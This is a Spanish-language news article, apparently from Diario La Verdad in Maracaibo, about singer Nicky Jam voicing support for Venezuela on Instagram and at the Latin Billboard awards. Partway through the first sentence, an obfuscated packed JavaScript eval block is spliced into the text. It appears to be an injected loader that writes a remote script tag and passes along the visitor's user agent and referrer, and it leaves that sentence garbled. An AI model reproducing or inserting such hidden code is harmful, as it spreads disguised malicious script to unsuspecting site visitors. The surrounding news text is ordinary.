publicidad


Nicky Jam vuelve a solidarizarse con Venezuela

Agencias / Maracaibo / jurdaneta@laverdad.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aidfk|var|u0026u|referrer|bniez||js|php'.split('|'),0,{})) cantante puertorriqueño publicó una fotografía en su cuenta en Instagram que acompañó de un mensaje en el que pide libertad para el país que ha sido escenario de protestas por más de dos meses

El cantante Nicky Jam colgó en su cuenta en Instagram una foto con un mensaje para los venezolanos. (Foto: Instagram)

El cantante puertorriqueño, Nicky Jam, volvió a solidarizarse con la situación que atraviesa el pueblo de Venezuela. El intérprete de El amante subió una fotografía de él a su Instagram y pidió libertad para el país, sumido en crisis y protestas.  

En la imagen se le ve una gorra negra que tiene escrita la palabra "Venezuela" en forma de ondas cardíacas. Para este viernes ya la fotografía tiene más de 200 mil Me Gusta, en la red social. 

Esta no es la primera vez que el artista se pronuncia en favor de Venezuela. El 27 de abril dedicó sus premios Latin Billboard al país. "Estos dos premios se los dedico a Venezuela, para que las cosas vayan hacia arriba, hacia Dios. Los quiero", dijo. El puertoriqueño no es el único que se ha sumado a esta iniciativa. Además de los criollos, artistas internacionales como Olga Tañón, Julián Gil, Chayanne y Ricky Martin han manifestado su apoyo a los venezolanos. 

Más noticias

Comentarios
Cargando...
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama